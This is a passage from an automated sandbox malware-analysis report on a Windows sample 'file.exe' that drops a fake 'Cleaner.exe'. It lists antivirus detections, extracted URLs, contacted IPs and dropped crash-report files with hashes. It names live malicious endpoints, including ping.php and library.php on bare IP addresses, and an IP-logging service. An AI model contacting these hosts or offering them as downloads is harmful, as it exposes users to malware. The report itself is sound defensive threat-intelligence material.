                  0.0.file.exe.400000.1.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.17.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.11.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.15.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.29.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.27.unpack100%AviraHEUR/AGEN.1250671Download File
                  0.0.file.exe.400000.3.unpack100%AviraHEUR/AGEN.1250671Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte100%URL Reputationmalware
                  http://www.sajatypeworks.com-0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cn0%URL Reputationsafe
                  https://take.rdrct-now.online/go/ZWKA?p78705p298845p11740%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/ho0%Avira URL Cloudsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.sajatypeworks.como20%Avira URL Cloudsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/jp/ho0%Avira URL Cloudsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/Y0ho0%Avira URL Cloudsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/.T0%URL Reputationsafe
                  http://www.typography.net0%URL Reputationsafe
                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte100%URL Reputationmalware
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.de0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://107.182.129.235/storage/ping.php0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.zhongyicts.com.cn.TTF0%Avira URL Cloudsafe
                  http://www.fontbureau.com(0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/.TTC0%URL Reputationsafe
                  http://www.sajatypeworks.comtr0%Avira URL Cloudsafe
                  http://107.182.129.235/storage/extension.php0%URL Reputationsafe
                  http://85.31.46.167/software.php0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/F0%URL Reputationsafe
                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst100%URL Reputationmalware
                  https://iplogger.orgx0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.founder.com.cn/cn/0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  https://g-cleanit.hk0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.sajatypeworks.comcom0%URL Reputationsafe
                  http://171.22.30.106/library.php100%URL Reputationmalware
                  http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p11740%Avira URL Cloudsafe
                  http://www.sakkal.comI0%Avira URL Cloudsafe
                  http://www.fontbureau.comH_0%Avira URL Cloudsafe
                  http://www.tiro.comq0%Avira URL Cloudsafe
                  http://www.sajatypeworks.comd:0%Avira URL Cloudsafe
                  http://www.typography.netad0%Avira URL Cloudsafe
                  http://www.monotype.90%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  iplogger.org
                  		148.251.234.83
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixintetrue
                    • URL Reputation: malware
                    		unknown
                    http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixintetrue
                    • URL Reputation: malware
                    		unknown
                    http://107.182.129.235/storage/ping.phpfalse
                    • URL Reputation: safe
                    		unknown
                    http://107.182.129.235/storage/extension.phpfalse
                    • URL Reputation: safe
                    		unknown
                    http://85.31.46.167/software.phptrue
                    • URL Reputation: safe
                    		unknown
                    https://iplogger.org/1Pz8p7false
                      		high
                      http://171.22.30.106/library.phptrue
                      • URL Reputation: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.jiyu-kobo.co.jp/hoCleaner.exe, 00000016.00000003.434005148.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.sajatypeworks.com-Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://www.fontbureau.com/designersGCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designers/?Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sajatypeworks.como2Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designers?Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/cnCleaner.exe, 00000016.00000003.430832292.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430600821.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430979463.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430553370.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/jp/hoCleaner.exe, 00000016.00000003.434380388.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434233291.000001CFE1B29000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174Cleaner.exe, 00000016.00000002.563291404.000001CFC91C1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.tiro.comCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersCleaner.exe, 00000016.00000003.439359814.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.goodfont.co.krCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y0hoCleaner.exe, 00000016.00000003.434005148.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sajatypeworks.comCleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428357477.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428374052.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428388847.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn/cTheCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/.TCleaner.exe, 00000016.00000003.434593062.000001CFE1B28000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.zhongyicts.com.cn.TTFCleaner.exe, 00000016.00000003.432353861.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com(Cleaner.exe, 00000016.00000003.437840133.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437639112.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://www.typography.netCleaner.exe, 00000016.00000003.429063853.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleaseCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comtrCleaner.exe, 00000016.00000003.428388847.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fonts.comCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sandoll.co.krCleaner.exe, 00000016.00000003.430026733.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deCleaner.exe, 00000016.00000003.436737283.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.436633622.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.436859788.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437363653.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437170500.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437117752.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437064705.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.436930103.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437229886.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnCleaner.exe, 00000016.00000003.432353861.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCleaner.exe, 00000016.00000002.565355076.000001CFC95BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designerspCleaner.exe, 00000016.00000003.439268166.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439104249.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439219729.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439012764.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.438961213.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439161982.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.sakkal.comCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersoCleaner.exe, 00000016.00000003.447075330.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.comCleaner.exe, 00000016.00000003.437639112.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/.TTCCleaner.exe, 00000016.00000003.434380388.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434233291.000001CFE1B29000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comH_Cleaner.exe, 00000016.00000003.436987400.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.sakkal.comICleaner.exe, 00000016.00000003.435071712.000001CFE1B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tiro.comqCleaner.exe, 00000016.00000003.431705459.000001CFE1B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/FCleaner.exe, 00000016.00000003.434005148.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substfile.exe, 00000000.00000000.352480046.000000000019B000.00000004.00000010.00020000.00000000.sdmptrue
                                          • URL Reputation: malware
                                          		unknown
                                          http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174file.exe, 00000000.00000003.396800531.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.364648566.00000000031C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.390225598.0000000003712000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.393566637.000000000371E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395142031.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392148582.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.389580944.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.398066889.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.394103173.0000000003913000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392869347.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397700050.0000000003934000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.396385601.0000000003924000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395883295.000000000371B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397228041.0000000003718000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.399409682.0000000003716000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.365552738.0000000003080000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://iplogger.orgCleaner.exe, 00000016.00000002.565355076.000001CFC95BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sajatypeworks.comd:Cleaner.exe, 00000016.00000003.428357477.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428374052.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://iplogger.orgxCleaner.exe, 00000016.00000002.565404043.000001CFC95CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.comlCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cn/Cleaner.exe, 00000016.00000003.431228141.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.431179686.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430147464.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://iplogger.orgCleaner.exe, 00000016.00000002.565434475.000001CFC95D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cnCleaner.exe, 00000016.00000003.430687491.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430832292.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430600821.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430933717.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430979463.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430553370.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430753328.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.431021568.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/frere-jones.htmlCleaner.exe, 00000016.00000003.438267437.000001CFE1B50000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.typography.netadCleaner.exe, 00000016.00000003.429063853.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://g-cleanit.hkfile.exe, 00000000.00000003.396800531.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.364648566.00000000031C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.390225598.0000000003712000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.393566637.000000000371E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395142031.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392148582.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.389580944.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.398066889.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.394103173.0000000003913000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392869347.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397700050.0000000003934000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.396385601.0000000003924000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395883295.000000000371B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397228041.0000000003718000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.399409682.0000000003716000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.365552738.0000000003080000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/Cleaner.exe, 00000016.00000003.434754929.000001CFE1B28000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434233291.000001CFE1B29000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434991979.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers8Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.sajatypeworks.comcomCleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/Cleaner.exe, 00000016.00000003.436930103.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.monotype.9Cleaner.exe, 00000016.00000003.444449589.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.444320811.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      148.251.234.83
                                                      		iplogger.orgGermany
                                                      		24940HETZNER-ASDEfalse
                                                      208.67.104.97
                                                      		unknownUnited States
                                                      		20042GRAYSON-COLLIN-COMMUNICATIONSUStrue
                                                      85.31.46.167
                                                      		unknownGermany
                                                      		43659CLOUDCOMPUTINGDEtrue
                                                      107.182.129.235
                                                      		unknownReserved
                                                      		11070META-ASUSfalse
                                                      171.22.30.106
                                                      		unknownGermany
                                                      		33657CMCSUSfalse

                                                      General Information

                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                      Analysis ID:715158
                                                      Start date and time:2022-10-03 17:28:33 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 10m 44s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:file.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:32
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal88.troj.winEXE@21/51@1/5
                                                      EGA Information:Failed
                                                      HDC Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 94%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                      • Execution Graph export aborted for target Cleaner.exe, PID 5208 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      17:30:22API Interceptor1x Sleep call for process: file.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASNs

                                                      No context

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_43a044097e5f3ef507ce7a9f19c0e6d280fb_440dec59_05057d34\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8413921404242342
                                                      Encrypted:false
                                                      SSDEEP:192:0+G1Vfav7FH56rrE3jDB/u7swS274It1hBx:a2x56rwjl/u7swX4ItN
                                                      MD5:AE8AE64294D6FA52CF25B72CCFA9B424
                                                      SHA1:67CFC19720494D42E2FE8A0CDABD5474ACACC806
                                                      SHA-256:E4029CF442A03D5230EE45AB951E41873E62F55561C138A958C2E78141247714
                                                      SHA-512:EE9FF764AE2408CAD8E2CBB2D5A5985D314D7BBDD70F1F55C878C31036775EC9D7A4DB5BAC50D6C4C892BE313B0AEF5B656912BC6288C94E240762F2CC20550B
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.9.7.4.7.2.3.0.7.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.8.6.6.8.d.c.7.-.e.8.b.6.-.4.7.a.d.-.b.f.4.9.-.e.6.7.9.9.6.0.b.5.5.3.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.7.a.f.1.f.f.-.5.9.2.7.-.4.7.1.e.-.8.6.e.f.-.2.7.5.e.7.2.1.0.6.8.a.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_43a044097e5f3ef507ce7a9f19c0e6d280fb_440dec59_0789c3c3\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8646212963389045
                                                      Encrypted:false
                                                      SSDEEP:192:QkG1VfavFFH56rrE3jDm/u7swS274It1hBx:C2P56rwjC/u7swX4ItN
                                                      MD5:F06265723A39C280E464EA71CB2340B2
                                                      SHA1:9EF034D5F7C208671F5F02DA0BDFBCF80B7B2450
                                                      SHA-256:5FD7EB50B113154EC744B2F5E5B4679A5837B3198F3235B96EC6B53C453586F5
